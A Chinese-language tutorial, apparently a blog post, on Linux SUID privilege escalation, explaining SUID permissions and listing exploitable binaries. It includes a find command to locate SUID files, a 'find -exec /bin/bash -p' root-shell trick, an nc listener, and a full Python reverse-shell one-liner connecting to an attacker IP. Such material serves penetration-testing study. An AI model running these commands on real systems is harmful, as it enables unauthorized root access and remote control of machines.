suid提权(linux)
suid提权
suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限)
除了经常看见的rwx权限还有s权限
s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。
SUID
当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权限。八进制数为4000
SUID 特殊权限具有如下特点:
- 只有可执行文件才能设定 SetUID 权限,对目录设定 SUID,是无效的。
- 用户要对该文件拥有 x(执行)权限。
- 用户在执行该文件时,会以文件所有者的身份执行。
- SetUID 权限只在文件执行过程中有效,一旦执行完毕,身份的切换也随之消失。
利用:
查找具有suid权限的文件
find / -perm -u=s -type f 2>/dev/null
/表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u=s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2表示该进程的第二个文件描述符,即stderr(标准错误)
>表示重定向
/dev/null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。
以下是一些可用于提权的二进制文件
nmap
vim
find
bash
more
less
nano
cp
awk
find
find / -perm -u=s -type f 2>/dev/null
touch wangw
find wangw -exec /bin/bash -p \;
在root权限下用python反弹shell
攻击机监听
nc -lvp 4445
反弹
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.155.153",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
但是反弹回来的不是root权限。。。。
suid提权(linux)相关推荐
- Linux中suid提权
一.原理: 设置了SUID的文件可以让调用者在调用该文件时以文件拥有者的身份运行该文件,所以利用SUID提权的原理就是运行拥有者为root并设置了SUID的文件,那么我们运行该文件的时候就得获得roo ...
- 《WEB安全渗透测试》(27)Linux系统提权-SUID提权
1.SUID提权介绍 提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了. linux中 ...
- Linux提权之Suid提权 小部分归纳
Linux提权之Suid提权 SUID是linux的一种权限机制 具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限.如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进 ...
- linux suid提权
SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行 时,使调用者暂时获得该文件拥有者的权限.也就是如果ROOT用户给某个可执行文件加了S权限,那么 该执行程 ...
- Linux下SUID提权方法
目录 SUID 1. 利用find文件提权 vulnhub靶机DC-1渗透-SUID提权 SUID SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户 ...
- linux——SUID提权
一.Linux之特殊权限--SUID Linux的文件操作除了普通的读 (r).写(w).执行(x)权限外,还有一些特殊的权限.但都可以使用chmod和chown命令来设置.他们分别是SUID.SGI ...
- linux系统suid提权
什么是suid suid(set uid)是linux中的一种特殊权限,suid可以让调用者以文件拥有者身份运行该文件,所以利用suid提权的核心就是运行root用户所拥有的suid的文件,那么运行 ...
- Linux怎么对当前目录提权,linux提权方法(不断总结更新)
1.suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2> ...
- 一文让你深刻理解什么是suid提权
一.课时目标 1.理解suid的概念和作用 2.掌握linux suid提权的方法 二.思考 思考: shadow文件存放用户密码,那普通用户在没有写权限的情况下如何修改密码并更新shadow文件中的 ...
最新文章
- Spring(一)容器
- 装了mysql但是服务里没有反应_Mysql安装后在服务里找不到和服务启动不起来的解决方法...
- 张首晟:用科学思维指导投资
- 【springmvc】@RequestParam详解以及加与不加的区别
- python判断文件是否存在 中文_python如何判断文件是否存在
- linux内核兼容性,各种glibc和Linux内核版本的兼容性
- 波士顿大学计算机科学的就业,波士顿大学计算机科学
- java中线程总结_java中多线程学习笔记总结
- AcWing 830. 单调栈
- Android手机开发课程设计之音乐播放器
- log4cplus指南
- 基于VUMAT复合材料夹层结构冲击仿真
- 银河麒麟v10离线安装docker-ce
- xmarks不能同步和访问之解决办法
- 汽车之家自动发帖回帖机器人
- VS 2010 测试功能学习(七) - RnP与Coded UI自动化测试
- Charles抓包遇到Not allowed POST https://xxxxxxxxxxx/xxxxxxxxxx connection dropped
- 苹果电池显示维修_安装第三方电池的iPhone也可享受苹果官方维修
- 【数据结构】初识时间空间复杂度
- 怎么修改计算机密码界面的背景,操作方法:在Win10中输入密码时如何修改登录界面的背景图片(两种方法)...